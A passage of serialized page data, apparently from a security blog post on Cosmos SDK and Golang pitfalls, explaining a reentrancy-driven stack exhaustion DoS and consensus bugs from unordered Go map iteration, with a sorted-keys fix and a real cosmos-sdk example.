write_region",{"type":24,"tag":301,"props":83885,"children":83886},{"style":359},[83887],{"type":30,"value":362},{"type":24,"tag":301,"props":83889,"children":83890},{"style":385},[83891],{"type":30,"value":556},{"type":24,"tag":301,"props":83893,"children":83894},{"style":369},[83895],{"type":30,"value":42434},{"type":24,"tag":301,"props":83897,"children":83898},{"style":385},[83899],{"type":30,"value":206},{"type":24,"tag":301,"props":83901,"children":83902},{"style":314},[83903],{"type":30,"value":82685},{"type":24,"tag":301,"props":83905,"children":83906},{"style":359},[83907],{"type":30,"value":25153},{"type":24,"tag":301,"props":83909,"children":83910},{"style":369},[83911],{"type":30,"value":83912},"target_ptr",{"type":24,"tag":301,"props":83914,"children":83915},{"style":359},[83916],{"type":30,"value":377},{"type":24,"tag":301,"props":83918,"children":83919},{"style":369},[83920],{"type":30,"value":15181},{"type":24,"tag":301,"props":83922,"children":83923},{"style":359},[83924],{"type":30,"value":9961},{"type":24,"tag":301,"props":83926,"children":83927},{"style":385},[83928],{"type":30,"value":2003},{"type":24,"tag":301,"props":83930,"children":83931},{"style":359},[83932],{"type":30,"value":492},{"type":24,"tag":301,"props":83934,"children":83935},{"class":303,"line":512},[83936,83940,83944,83948],{"type":24,"tag":301,"props":83937,"children":83938},{"style":10246},[83939],{"type":30,"value":21125},{"type":24,"tag":301,"props":83941,"children":83942},{"style":359},[83943],{"type":30,"value":362},{"type":24,"tag":301,"props":83945,"children":83946},{"style":369},[83947],{"type":30,"value":83912},{"type":24,"tag":301,"props":83949,"children":83950},{"style":359},[83951],{"type":30,"value":791},{"type":24,"tag":301,"props":83953,"children":83954},{"class":303,"line":592},[83955],{"type":24,"tag":301,"props":83956,"children":83957},{"style":359},[83958],{"type":30,"value":698},{"type":24,"tag":32,"props":83960,"children":83961},{},[83962,83964,83970,83972,83977],{"type":30,"value":83963},"As users have complete control over ",{"type":24,"tag":145,"props":83965,"children":83967},{"className":83966},[],[83968],{"type":30,"value":83969},"allocate",{"type":30,"value":83971},", there is a possibility to call back ",{"type":24,"tag":145,"props":83973,"children":83975},{"className":83974},[],[83976],{"type":30,"value":83432},{"type":30,"value":83978}," repeatedly through other imported functions. This can result in the depletion of the host stack and ultimately lead to a DoS.",{"type":24,"tag":32,"props":83980,"children":83981},{},[83982,83984,83991],{"type":30,"value":83983},"Additional real-world examples include ",{"type":24,"tag":188,"props":83985,"children":83988},{"href":83986,"rel":83987},"https://github.com/cosmos/cosmos-sdk/issues/16676",[192],[83989],{"type":30,"value":83990},"not returning proper values for malformed txs",{"type":30,"value":206},{"type":24,"tag":43,"props":83993,"children":83995},{"id":83994},"order-was-the-dream-of-man",[83996],{"type":30,"value":83997},"Order Was the Dream of Man",{"type":24,"tag":32,"props":83999,"children":84000},{},[84001],{"type":30,"value":84002},"Different from solidity, which is a domain-specific language for smart contracts, Golang is not. Therefore, developers must be mindful of specific footguns. One notable instance is non-determinism.",{"type":24,"tag":32,"props":84004,"children":84005},{},[84006],{"type":30,"value":84007},"Consider a scenario where there is a requirement to emit an event for every entry in a map. It might be tempting to implement this as demonstrated below:",{"type":24,"tag":291,"props":84009,"children":84011},{"code":84010,"language":82877,"meta":7,"className":82878,"style":7},"type ObjectMap map[string]string\n\nfunc EmitEntries(objectMap ObjectMap) {\n for key, value := range objectMap {\n ctx.EventManager.EmitEvent(\n sdk.NewEvent(\n \"MapContext\",\n sdk.NewAttribute(key, value),\n )\n )\n }\n}\n",[84012],{"type":24,"tag":145,"props":84013,"children":84014},{"__ignoreMap":7},[84015,84048,84055,84084,84121,84150,84171,84183,84220,84228,84235,84242],{"type":24,"tag":301,"props":84016,"children":84017},{"class":303,"line":304},[84018,84022,84027,84031,84035,84039,84043],{"type":24,"tag":301,"props":84019,"children":84020},{"style":348},[84021],{"type":30,"value":7026},{"type":24,"tag":301,"props":84023,"children":84024},{"style":10246},[84025],{"type":30,"value":84026}," ObjectMap",{"type":24,"tag":301,"props":84028,"children":84029},{"style":348},[84030],{"type":30,"value":56399},{"type":24,"tag":301,"props":84032,"children":84033},{"style":359},[84034],{"type":30,"value":541},{"type":24,"tag":301,"props":84036,"children":84037},{"style":10246},[84038],{"type":30,"value":36423},{"type":24,"tag":301,"props":84040,"children":84041},{"style":359},[84042],{"type":30,"value":22200},{"type":24,"tag":301,"props":84044,"children":84045},{"style":10246},[84046],{"type":30,"value":84047},"string\n",{"type":24,"tag":301,"props":84049,"children":84050},{"class":303,"line":320},[84051],{"type":24,"tag":301,"props":84052,"children":84053},{"emptyLinePlaceholder":16},[84054],{"type":30,"value":341},{"type":24,"tag":301,"props":84056,"children":84057},{"class":303,"line":335},[84058,84062,84067,84071,84076,84080],{"type":24,"tag":301,"props":84059,"children":84060},{"style":348},[84061],{"type":30,"value":83013},{"type":24,"tag":301,"props":84063,"children":84064},{"style":314},[84065],{"type":30,"value":84066}," EmitEntries",{"type":24,"tag":301,"props":84068,"children":84069},{"style":359},[84070],{"type":30,"value":362},{"type":24,"tag":301,"props":84072,"children":84073},{"style":369},[84074],{"type":30,"value":84075},"objectMap",{"type":24,"tag":301,"props":84077,"children":84078},{"style":10246},[84079],{"type":30,"value":84026},{"type":24,"tag":301,"props":84081,"children":84082},{"style":359},[84083],{"type":30,"value":398},{"type":24,"tag":301,"props":84085,"children":84086},{"class":303,"line":344},[84087,84091,84095,84099,84103,84107,84112,84117],{"type":24,"tag":301,"props":84088,"children":84089},{"style":308},[84090],{"type":30,"value":3249},{"type":24,"tag":301,"props":84092,"children":84093},{"style":369},[84094],{"type":30,"value":12751},{"type":24,"tag":301,"props":84096,"children":84097},{"style":359},[84098],{"type":30,"value":377},{"type":24,"tag":301,"props":84100,"children":84101},{"style":369},[84102],{"type":30,"value":5958},{"type":24,"tag":301,"props":84104,"children":84105},{"style":385},[84106],{"type":30,"value":83129},{"type":24,"tag":301,"props":84108,"children":84109},{"style":308},[84110],{"type":30,"value":84111}," range",{"type":24,"tag":301,"props":84113,"children":84114},{"style":369},[84115],{"type":30,"value":84116}," objectMap",{"type":24,"tag":301,"props":84118,"children":84119},{"style":359},[84120],{"type":30,"value":3035},{"type":24,"tag":301,"props":84122,"children":84123},{"class":303,"line":401},[84124,84128,84132,84137,84141,84146],{"type":24,"tag":301,"props":84125,"children":84126},{"style":369},[84127],{"type":30,"value":32942},{"type":24,"tag":301,"props":84129,"children":84130},{"style":359},[84131],{"type":30,"value":206},{"type":24,"tag":301,"props":84133,"children":84134},{"style":369},[84135],{"type":30,"value":84136},"EventManager",{"type":24,"tag":301,"props":84138,"children":84139},{"style":359},[84140],{"type":30,"value":206},{"type":24,"tag":301,"props":84142,"children":84143},{"style":314},[84144],{"type":30,"value":84145},"EmitEvent",{"type":24,"tag":301,"props":84147,"children":84148},{"style":359},[84149],{"type":30,"value":1707},{"type":24,"tag":301,"props":84151,"children":84152},{"class":303,"line":415},[84153,84158,84162,84167],{"type":24,"tag":301,"props":84154,"children":84155},{"style":369},[84156],{"type":30,"value":84157}," sdk",{"type":24,"tag":301,"props":84159,"children":84160},{"style":359},[84161],{"type":30,"value":206},{"type":24,"tag":301,"props":84163,"children":84164},{"style":314},[84165],{"type":30,"value":84166},"NewEvent",{"type":24,"tag":301,"props":84168,"children":84169},{"style":359},[84170],{"type":30,"value":1707},{"type":24,"tag":301,"props":84172,"children":84173},{"class":303,"line":439},[84174,84179],{"type":24,"tag":301,"props":84175,"children":84176},{"style":329},[84177],{"type":30,"value":84178}," \"MapContext\"",{"type":24,"tag":301,"props":84180,"children":84181},{"style":359},[84182],{"type":30,"value":1729},{"type":24,"tag":301,"props":84184,"children":84185},{"class":303,"line":447},[84186,84191,84195,84200,84204,84208,84212,84216],{"type":24,"tag":301,"props":84187,"children":84188},{"style":369},[84189],{"type":30,"value":84190}," sdk",{"type":24,"tag":301,"props":84192,"children":84193},{"style":359},[84194],{"type":30,"value":206},{"type":24,"tag":301,"props":84196,"children":84197},{"style":314},[84198],{"type":30,"value":84199},"NewAttribute",{"type":24,"tag":301,"props":84201,"children":84202},{"style":359},[84203],{"type":30,"value":362},{"type":24,"tag":301,"props":84205,"children":84206},{"style":369},[84207],{"type":30,"value":78868},{"type":24,"tag":301,"props":84209,"children":84210},{"style":359},[84211],{"type":30,"value":377},{"type":24,"tag":301,"props":84213,"children":84214},{"style":369},[84215],{"type":30,"value":5958},{"type":24,"tag":301,"props":84217,"children":84218},{"style":359},[84219],{"type":30,"value":4656},{"type":24,"tag":301,"props":84221,"children":84222},{"class":303,"line":476},[84223],{"type":24,"tag":301,"props":84224,"children":84225},{"style":359},[84226],{"type":30,"value":84227}," )\n",{"type":24,"tag":301,"props":84229,"children":84230},{"class":303,"line":495},[84231],{"type":24,"tag":301,"props":84232,"children":84233},{"style":359},[84234],{"type":30,"value":75033},{"type":24,"tag":301,"props":84236,"children":84237},{"class":303,"line":504},[84238],{"type":24,"tag":301,"props":84239,"children":84240},{"style":359},[84241],{"type":30,"value":501},{"type":24,"tag":301,"props":84243,"children":84244},{"class":303,"line":512},[84245],{"type":24,"tag":301,"props":84246,"children":84247},{"style":359},[84248],{"type":30,"value":698},{"type":24,"tag":32,"props":84250,"children":84251},{},[84252],{"type":30,"value":84253},"It's important to note that Golang map iterators are unordered by design. As stated below in the Golang documentation citation, running the same code with different validators may result in varying event orders, potentially causing consensus problems.",{"type":24,"tag":9770,"props":84255,"children":84256},{},[84257],{"type":24,"tag":32,"props":84258,"children":84259},{},[84260],{"type":30,"value":84261},"When iterating over a map with a range loop, the iteration order is not specified and is not guaranteed to be the same from one iteration to the next.",{"type":24,"tag":32,"props":84263,"children":84264},{},[84265,84267,84272],{"type":30,"value":84266},"To correctly implement iteration orders, developers must explicitly sort the keys of the ",{"type":24,"tag":145,"props":84268,"children":84270},{"className":84269},[],[84271],{"type":30,"value":73814},{"type":30,"value":84273}," and then fetch the values using the sorted key array before emitting them.",{"type":24,"tag":291,"props":84275,"children":84277},{"code":84276,"language":82877,"meta":7,"className":82878,"style":7},"type ObjectMap map[string]string\n\nfunc EmitEntries(objectMap ObjectMap) {\n var keys []string\n for key := range objectMap {\n keys = append(keys, key)\n }\n sort.Strings(keys)\n\n for _, key := range keys {\n ctx.EventManager.EmitEvent(\n sdk.NewEvent(\n \"MapContext\",\n sdk.NewAttribute(key, objectMap[key]),\n )\n )\n }\n}\n",[84278],{"type":24,"tag":145,"props":84279,"children":84280},{"__ignoreMap":7},[84281,84312,84319,84346,84366,84393,84429,84436,84465,84472,84507,84534,84553,84564,84608,84615,84622,84629],{"type":24,"tag":301,"props":84282,"children":84283},{"class":303,"line":304},[84284,84288,84292,84296,84300,84304,84308],{"type":24,"tag":301,"props":84285,"children":84286},{"style":348},[84287],{"type":30,"value":7026},{"type":24,"tag":301,"props":84289,"children":84290},{"style":10246},[84291],{"type":30,"value":84026},{"type":24,"tag":301,"props":84293,"children":84294},{"style":348},[84295],{"type":30,"value":56399},{"type":24,"tag":301,"props":84297,"children":84298},{"style":359},[84299],{"type":30,"value":541},{"type":24,"tag":301,"props":84301,"children":84302},{"style":10246},[84303],{"type":30,"value":36423},{"type":24,"tag":301,"props":84305,"children":84306},{"style":359},[84307],{"type":30,"value":22200},{"type":24,"tag":301,"props":84309,"children":84310},{"style":10246},[84311],{"type":30,"value":84047},{"type":24,"tag":301,"props":84313,"children":84314},{"class":303,"line":320},[84315],{"type":24,"tag":301,"props":84316,"children":84317},{"emptyLinePlaceholder":16},[84318],{"type":30,"value":341},{"type":24,"tag":301,"props":84320,"children":84321},{"class":303,"line":335},[84322,84326,84330,84334,84338,84342],{"type":24,"tag":301,"props":84323,"children":84324},{"style":348},[84325],{"type":30,"value":83013},{"type":24,"tag":301,"props":84327,"children":84328},{"style":314},[84329],{"type":30,"value":84066},{"type":24,"tag":301,"props":84331,"children":84332},{"style":359},[84333],{"type":30,"value":362},{"type":24,"tag":301,"props":84335,"children":84336},{"style":369},[84337],{"type":30,"value":84075},{"type":24,"tag":301,"props":84339,"children":84340},{"style":10246},[84341],{"type":30,"value":84026},{"type":24,"tag":301,"props":84343,"children":84344},{"style":359},[84345],{"type":30,"value":398},{"type":24,"tag":301,"props":84347,"children":84348},{"class":303,"line":344},[84349,84354,84358,84362],{"type":24,"tag":301,"props":84350,"children":84351},{"style":348},[84352],{"type":30,"value":84353}," var",{"type":24,"tag":301,"props":84355,"children":84356},{"style":369},[84357],{"type":30,"value":28149},{"type":24,"tag":301,"props":84359,"children":84360},{"style":359},[84361],{"type":30,"value":82940},{"type":24,"tag":301,"props":84363,"children":84364},{"style":10246},[84365],{"type":30,"value":84047},{"type":24,"tag":301,"props":84367,"children":84368},{"class":303,"line":401},[84369,84373,84377,84381,84385,84389],{"type":24,"tag":301,"props":84370,"children":84371},{"style":308},[84372],{"type":30,"value":3249},{"type":24,"tag":301,"props":84374,"children":84375},{"style":369},[84376],{"type":30,"value":12751},{"type":24,"tag":301,"props":84378,"children":84379},{"style":385},[84380],{"type":30,"value":83129},{"type":24,"tag":301,"props":84382,"children":84383},{"style":308},[84384],{"type":30,"value":84111},{"type":24,"tag":301,"props":84386,"children":84387},{"style":369},[84388],{"type":30,"value":84116},{"type":24,"tag":301,"props":84390,"children":84391},{"style":359},[84392],{"type":30,"value":3035},{"type":24,"tag":301,"props":84394,"children":84395},{"class":303,"line":415},[84396,84400,84404,84409,84413,84417,84421,84425],{"type":24,"tag":301,"props":84397,"children":84398},{"style":369},[84399],{"type":30,"value":32087},{"type":24,"tag":301,"props":84401,"children":84402},{"style":385},[84403],{"type":30,"value":2537},{"type":24,"tag":301,"props":84405,"children":84406},{"style":314},[84407],{"type":30,"value":84408}," append",{"type":24,"tag":301,"props":84410,"children":84411},{"style":359},[84412],{"type":30,"value":362},{"type":24,"tag":301,"props":84414,"children":84415},{"style":369},[84416],{"type":30,"value":27752},{"type":24,"tag":301,"props":84418,"children":84419},{"style":359},[84420],{"type":30,"value":377},{"type":24,"tag":301,"props":84422,"children":84423},{"style":369},[84424],{"type":30,"value":78868},{"type":24,"tag":301,"props":84426,"children":84427},{"style":359},[84428],{"type":30,"value":791},{"type":24,"tag":301,"props":84430,"children":84431},{"class":303,"line":439},[84432],{"type":24,"tag":301,"props":84433,"children":84434},{"style":359},[84435],{"type":30,"value":501},{"type":24,"tag":301,"props":84437,"children":84438},{"class":303,"line":447},[84439,84444,84448,84453,84457,84461],{"type":24,"tag":301,"props":84440,"children":84441},{"style":369},[84442],{"type":30,"value":84443}," sort",{"type":24,"tag":301,"props":84445,"children":84446},{"style":359},[84447],{"type":30,"value":206},{"type":24,"tag":301,"props":84449,"children":84450},{"style":314},[84451],{"type":30,"value":84452},"Strings",{"type":24,"tag":301,"props":84454,"children":84455},{"style":359},[84456],{"type":30,"value":362},{"type":24,"tag":301,"props":84458,"children":84459},{"style":369},[84460],{"type":30,"value":27752},{"type":24,"tag":301,"props":84462,"children":84463},{"style":359},[84464],{"type":30,"value":791},{"type":24,"tag":301,"props":84466,"children":84467},{"class":303,"line":476},[84468],{"type":24,"tag":301,"props":84469,"children":84470},{"emptyLinePlaceholder":16},[84471],{"type":30,"value":341},{"type":24,"tag":301,"props":84473,"children":84474},{"class":303,"line":495},[84475,84479,84483,84487,84491,84495,84499,84503],{"type":24,"tag":301,"props":84476,"children":84477},{"style":308},[84478],{"type":30,"value":3249},{"type":24,"tag":301,"props":84480,"children":84481},{"style":369},[84482],{"type":30,"value":9873},{"type":24,"tag":301,"props":84484,"children":84485},{"style":359},[84486],{"type":30,"value":377},{"type":24,"tag":301,"props":84488,"children":84489},{"style":369},[84490],{"type":30,"value":78868},{"type":24,"tag":301,"props":84492,"children":84493},{"style":385},[84494],{"type":30,"value":83129},{"type":24,"tag":301,"props":84496,"children":84497},{"style":308},[84498],{"type":30,"value":84111},{"type":24,"tag":301,"props":84500,"children":84501},{"style":369},[84502],{"type":30,"value":28149},{"type":24,"tag":301,"props":84504,"children":84505},{"style":359},[84506],{"type":30,"value":3035},{"type":24,"tag":301,"props":84508,"children":84509},{"class":303,"line":504},[84510,84514,84518,84522,84526,84530],{"type":24,"tag":301,"props":84511,"children":84512},{"style":369},[84513],{"type":30,"value":32942},{"type":24,"tag":301,"props":84515,"children":84516},{"style":359},[84517],{"type":30,"value":206},{"type":24,"tag":301,"props":84519,"children":84520},{"style":369},[84521],{"type":30,"value":84136},{"type":24,"tag":301,"props":84523,"children":84524},{"style":359},[84525],{"type":30,"value":206},{"type":24,"tag":301,"props":84527,"children":84528},{"style":314},[84529],{"type":30,"value":84145},{"type":24,"tag":301,"props":84531,"children":84532},{"style":359},[84533],{"type":30,"value":1707},{"type":24,"tag":301,"props":84535,"children":84536},{"class":303,"line":512},[84537,84541,84545,84549],{"type":24,"tag":301,"props":84538,"children":84539},{"style":369},[84540],{"type":30,"value":84157},{"type":24,"tag":301,"props":84542,"children":84543},{"style":359},[84544],{"type":30,"value":206},{"type":24,"tag":301,"props":84546,"children":84547},{"style":314},[84548],{"type":30,"value":84166},{"type":24,"tag":301,"props":84550,"children":84551},{"style":359},[84552],{"type":30,"value":1707},{"type":24,"tag":301,"props":84554,"children":84555},{"class":303,"line":592},[84556,84560],{"type":24,"tag":301,"props":84557,"children":84558},{"style":329},[84559],{"type":30,"value":84178},{"type":24,"tag":301,"props":84561,"children":84562},{"style":359},[84563],{"type":30,"value":1729},{"type":24,"tag":301,"props":84565,"children":84566},{"class":303,"line":619},[84567,84571,84575,84579,84583,84587,84591,84595,84599,84603],{"type":24,"tag":301,"props":84568,"children":84569},{"style":369},[84570],{"type":30,"value":84190},{"type":24,"tag":301,"props":84572,"children":84573},{"style":359},[84574],{"type":30,"value":206},{"type":24,"tag":301,"props":84576,"children":84577},{"style":314},[84578],{"type":30,"value":84199},{"type":24,"tag":301,"props":84580,"children":84581},{"style":359},[84582],{"type":30,"value":362},{"type":24,"tag":301,"props":84584,"children":84585},{"style":369},[84586],{"type":30,"value":78868},{"type":24,"tag":301,"props":84588,"children":84589},{"style":359},[84590],{"type":30,"value":377},{"type":24,"tag":301,"props":84592,"children":84593},{"style":369},[84594],{"type":30,"value":84075},{"type":24,"tag":301,"props":84596,"children":84597},{"style":359},[84598],{"type":30,"value":541},{"type":24,"tag":301,"props":84600,"children":84601},{"style":369},[84602],{"type":30,"value":78868},{"type":24,"tag":301,"props":84604,"children":84605},{"style":359},[84606],{"type":30,"value":84607},"]),\n",{"type":24,"tag":301,"props":84609,"children":84610},{"class":303,"line":635},[84611],{"type":24,"tag":301,"props":84612,"children":84613},{"style":359},[84614],{"type":30,"value":84227},{"type":24,"tag":301,"props":84616,"children":84617},{"class":303,"line":643},[84618],{"type":24,"tag":301,"props":84619,"children":84620},{"style":359},[84621],{"type":30,"value":75033},{"type":24,"tag":301,"props":84623,"children":84624},{"class":303,"line":652},[84625],{"type":24,"tag":301,"props":84626,"children":84627},{"style":359},[84628],{"type":30,"value":501},{"type":24,"tag":301,"props":84630,"children":84631},{"class":303,"line":666},[84632],{"type":24,"tag":301,"props":84633,"children":84634},{"style":359},[84635],{"type":30,"value":698},{"type":24,"tag":32,"props":84637,"children":84638},{},[84639],{"type":30,"value":84640},"The combination of hidden code within external Golang dependencies makes it difficult to avoid language-wise quirks fully. It is crucial to remain vigilant and avoid underestimating the gravity of this lingering bug class.",{"type":24,"tag":80,"props":84642,"children":84644},{"id":84643},"real-world-examples-1",[84645],{"type":30,"value":83401},{"type":24,"tag":32,"props":84647,"children":84648},{},[84649,84651,84656,84658,84664,84666,84672,84674,84680],{"type":30,"value":84650},"Real-world examples of ",{"type":24,"tag":145,"props":84652,"children":84654},{"className":84653},[],[84655],{"type":30,"value":73814},{"type":30,"value":84657}," causing determinism problems can be found ",{"type":24,"tag":188,"props":84659,"children":84662},{"href":84660,"rel":84661},"https://github.com/cosmos/cosmos-sdk/pull/12487",[192],[84663],{"type":30,"value":5193},{"type":30,"value":84665},", specifically, where the result of ",{"type":24,"tag":145,"props":84667,"children":84669},{"className":84668},[],[84670],{"type":30,"value":84671},"buildCommitInfo",{"type":30,"value":84673}," is inconsistent due to iteration over the ",{"type":24,"tag":145,"props":84675,"children":84677},{"className":84676},[],[84678],{"type":30,"value":84679},"rs.stores",{"type":30,"value":84681}," map.",{"type":24,"tag":32,"props":84683,"children":84684},{},[84685],{"type":24,"tag":188,"props":84686,"children":84689},{"href":84687,"rel":84688},"https://github.com/cosmos/cosmos-sdk/blob/55054282d2df794d9a5fe2599ea25473379ebc3d/store/rootmulti/store.go#L909",[192],[84690],{"type":30,"value":83451},{"type":24,"tag":291,"props":84692,"children":84694},{"code":84693,"language":82877,"meta":7,"className":82878,"style":7},"func (rs *Store) buildCommitInfo(\n version int64\n) *types.CommitInfo {\n storeInfos := []types.StoreInfo{}\n for key, store := range rs.stores {\n if store.GetStoreType() == types.StoreTypeTransient {\n continue\n }\n storeInfos = append(storeInfos, types.StoreInfo{\n Name: key.Name(),\n CommitId: store.LastCommitID(),\n })\n }\n return &types.CommitInfo{\n Version: version,\n StoreInfos: storeInfos,\n }\n}\n",[84695],{"type":24,"tag":145,"props":84696,"children":84697},{"__ignoreMap":7},[84698,84735,84748,84776,84810,84855,84901,84909,84916,84961,84991,85020,85027,85034,85061,85083,85103,85110],{"type":24,"tag":301,"props":84699,"children":84700},{"class":303,"line":304},[84701,84705,84709,84714,84718,84723,84727,84731],{"type":24,"tag":301,"props":84702,"children":84703},{"style":348},[84704],{"type":30,"value":83013},{"type":24,"tag":301,"props":84706,"children":84707},{"style":359},[84708],{"type":30,"value":873},{"type":24,"tag":301,"props":84710,"children":84711},{"style":369},[84712],{"type":30,"value":84713},"rs ",{"type":24,"tag":301,"props":84715,"children":84716},{"style":385},[84717],{"type":30,"value":772},{"type":24,"tag":301,"props":84719,"children":84720},{"style":10246},[84721],{"type":30,"value":84722},"Store",{"type":24,"tag":301,"props":84724,"children":84725},{"style":359},[84726],{"type":30,"value":911},{"type":24,"tag":301,"props":84728,"children":84729},{"style":314},[84730],{"type":30,"value":84671},{"type":24,"tag":301,"props":84732,"children":84733},{"style":359},[84734],{"type":30,"value":1707},{"type":24,"tag":301,"props":84736,"children":84737},{"class":303,"line":320},[84738,84743],{"type":24,"tag":301,"props":84739,"children":84740},{"style":369},[84741],{"type":30,"value":84742}," version",{"type":24,"tag":301,"props":84744,"children":84745},{"style":10246},[84746],{"type":30,"value":84747}," int64\n",{"type":24,"tag":301,"props":84749,"children":84750},{"class":303,"line":335},[84751,84755,84759,84763,84767,84772],{"type":24,"tag":301,"props":84752,"children":84753},{"style":359},[84754],{"type":30,"value":911},{"type":24,"tag":301,"props":84756,"children":84757},{"style":385},[84758],{"type":30,"value":772},{"type":24,"tag":301,"props":84760,"children":84761},{"style":10246},[84762],{"type":30,"value":12579},{"type":24,"tag":301,"props":84764,"children":84765},{"style":359},[84766],{"type":30,"value":206},{"type":24,"tag":301,"props":84768,"children":84769},{"style":10246},[84770],{"type":30,"value":84771},"CommitInfo",{"type":24,"tag":301,"props":84773,"children":84774},{"style":359},[84775],{"type":30,"value":3035},{"type":24,"tag":301,"props":84777,"children":84778},{"class":303,"line":344},[84779,84784,84788,84792,84796,84800,84805],{"type":24,"tag":301,"props":84780,"children":84781},{"style":369},[84782],{"type":30,"value":84783}," storeInfos",{"type":24,"tag":301,"props":84785,"children":84786},{"style":385},[84787],{"type":30,"value":83129},{"type":24,"tag":301,"props":84789,"children":84790},{"style":359},[84791],{"type":30,"value":82940},{"type":24,"tag":301,"props":84793,"children":84794},{"style":10246},[84795],{"type":30,"value":12579},{"type":24,"tag":301,"props":84797,"children":84798},{"style":359},[84799],{"type":30,"value":206},{"type":24,"tag":301,"props":84801,"children":84802},{"style":10246},[84803],{"type":30,"value":84804},"StoreInfo",{"type":24,"tag":301,"props":84806,"children":84807},{"style":359},[84808],{"type":30,"value":84809},"{}\n",{"type":24,"tag":301,"props":84811,"children":84812},{"class":303,"line":401},[84813,84817,84821,84825,84829,84833,84837,84842,84846,84851],{"type":24,"tag":301,"props":84814,"children":84815},{"style":308},[84816],{"type":30,"value":3249},{"type":24,"tag":301,"props":84818,"children":84819},{"style":369},[84820],{"type":30,"value":12751},{"type":24,"tag":301,"props":84822,"children":84823},{"style":359},[84824],{"type":30,"value":377},{"type":24,"tag":301,"props":84826,"children":84827},{"style":369},[84828],{"type":30,"value":12760},{"type":24,"tag":301,"props":84830,"children":84831},{"style":385},[84832],{"type":30,"value":83129},{"type":24,"tag":301,"props":84834,"children":84835},{"style":308},[84836],{"type":30,"value":84111},{"type":24,"tag":301,"props":84838,"children":84839},{"style":369},[84840],{"type":30,"value":84841}," rs",{"type":24,"tag":301,"props":84843,"children":84844},{"style":359},[84845],{"type":30,"value":206},{"type":24,"tag":301,"props":84847,"children":84848},{"style":369},[84849],{"type":30,"value":84850},"stores",{"type":24,"tag":301,"props":84852,"children":84853},{"style":359},[84854],{"type":30,"value":3035},{"type":24,"tag":301,"props":84856,"children":84857},{"class":303,"line":415},[84858,84862,84866,84870,84875,84879,84883,84888,84892,84897],{"type":24,"tag":301,"props":84859,"children":84860},{"style":308},[84861],{"type":30,"value":3285},{"type":24,"tag":301,"props":84863,"children":84864},{"style":369},[84865],{"type":30,"value":12651},{"type":24,"tag":301,"props":84867,"children":84868},{"style":359},[84869],{"type":30,"value":206},{"type":24,"tag":301,"props":84871,"children":84872},{"style":314},[84873],{"type":30,"value":84874},"GetStoreType",{"type":24,"tag":301,"props":84876,"children":84877},{"style":359},[84878],{"type":30,"value":20835},{"type":24,"tag":301,"props":84880,"children":84881},{"style":385},[84882],{"type":30,"value":607},{"type":24,"tag":301,"props":84884,"children":84885},{"style":369},[84886],{"type":30,"value":84887}," types",{"type":24,"tag":301,"props":84889,"children":84890},{"style":359},[84891],{"type":30,"value":206},{"type":24,"tag":301,"props":84893,"children":84894},{"style":369},[84895],{"type":30,"value":84896},"StoreTypeTransient",{"type":24,"tag":301,"props":84898,"children":84899},{"style":359},[84900],{"type":30,"value":3035},{"type":24,"tag":301,"props":84902,"children":84903},{"class":303,"line":439},[84904],{"type":24,"tag":301,"props":84905,"children":84906},{"style":308},[84907],{"type":30,"value":84908}," continue\n",{"type":24,"tag":301,"props":84910,"children":84911},{"class":303,"line":447},[84912],{"type":24,"tag":301,"props":84913,"children":84914},{"style":359},[84915],{"type":30,"value":3345},{"type":24,"tag":301,"props":84917,"children":84918},{"class":303,"line":476},[84919,84924,84928,84932,84936,84941,84945,84949,84953,84957],{"type":24,"tag":301,"props":84920,"children":84921},{"style":369},[84922],{"type":30,"value":84923}," storeInfos",{"type":24,"tag":301,"props":84925,"children":84926},{"style":385},[84927],{"type":30,"value":2537},{"type":24,"tag":301,"props":84929,"children":84930},{"style":314},[84931],{"type":30,"value":84408},{"type":24,"tag":301,"props":84933,"children":84934},{"style":359},[84935],{"type":30,"value":362},{"type":24,"tag":301,"props":84937,"children":84938},{"style":369},[84939],{"type":30,"value":84940},"storeInfos",{"type":24,"tag":301,"props":84942,"children":84943},{"style":359},[84944],{"type":30,"value":377},{"type":24,"tag":301,"props":84946,"children":84947},{"style":10246},[84948],{"type":30,"value":12579},{"type":24,"tag":301,"props":84950,"children":84951},{"style":359},[84952],{"type":30,"value":206},{"type":24,"tag":301,"props":84954,"children":84955},{"style":10246},[84956],{"type":30,"value":84804},{"type":24,"tag":301,"props":84958,"children":84959},{"style":359},[84960],{"type":30,"value":799},{"type":24,"tag":301,"props":84962,"children":84963},{"class":303,"line":495},[84964,84969,84974,84978,84982,84987],{"type":24,"tag":301,"props":84965,"children":84966},{"style":369},[84967],{"type":30,"value":84968}," Name",{"type":24,"tag":301,"props":84970,"children":84971},{"style":359},[84972],{"type":30,"value":84973},": ",{"type":24,"tag":301,"props":84975,"children":84976},{"style":369},[84977],{"type":30,"value":78868},{"type":24,"tag":301,"props":84979,"children":84980},{"style":359},[84981],{"type":30,"value":206},{"type":24,"tag":301,"props":84983,"children":84984},{"style":314},[84985],{"type":30,"value":84986},"Name",{"type":24,"tag":301,"props":84988,"children":84989},{"style":359},[84990],{"type":30,"value":10318},{"type":24,"tag":301,"props":84992,"children":84993},{"class":303,"line":504},[84994,84999,85003,85007,85011,85016],{"type":24,"tag":301,"props":84995,"children":84996},{"style":369},[84997],{"type":30,"value":84998}," CommitId",{"type":24,"tag":301,"props":85000,"children":85001},{"style":359},[85002],{"type":30,"value":5615},{"type":24,"tag":301,"props":85004,"children":85005},{"style":369},[85006],{"type":30,"value":12760},{"type":24,"tag":301,"props":85008,"children":85009},{"style":359},[85010],{"type":30,"value":206},{"type":24,"tag":301,"props":85012,"children":85013},{"style":314},[85014],{"type":30,"value":85015},"LastCommitID",{"type":24,"tag":301,"props":85017,"children":85018},{"style":359},[85019],{"type":30,"value":10318},{"type":24,"tag":301,"props":85021,"children":85022},{"class":303,"line":512},[85023],{"type":24,"tag":301,"props":85024,"children":85025},{"style":359},[85026],{"type":30,"value":74910},{"type":24,"tag":301,"props":85028,"children":85029},{"class":303,"line":592},[85030],{"type":24,"tag":301,"props":85031,"children":85032},{"style":359},[85033],{"type":30,"value":501},{"type":24,"tag":301,"props":85035,"children":85036},{"class":303,"line":619},[85037,85041,85045,85049,85053,85057],{"type":24,"tag":301,"props":85038,"children":85039},{"style":308},[85040],{"type":30,"value":680},{"type":24,"tag":301,"props":85042,"children":85043},{"style":385},[85044],{"type":30,"value":991},{"type":24,"tag":301,"props":85046,"children":85047},{"style":10246},[85048],{"type":30,"value":12579},{"type":24,"tag":301,"props":85050,"children":85051},{"style":359},[85052],{"type":30,"value":206},{"type":24,"tag":301,"props":85054,"children":85055},{"style":10246},[85056],{"type":30,"value":84771},{"type":24,"tag":301,"props":85058,"children":85059},{"style":359},[85060],{"type":30,"value":799},{"type":24,"tag":301,"props":85062,"children":85063},{"class":303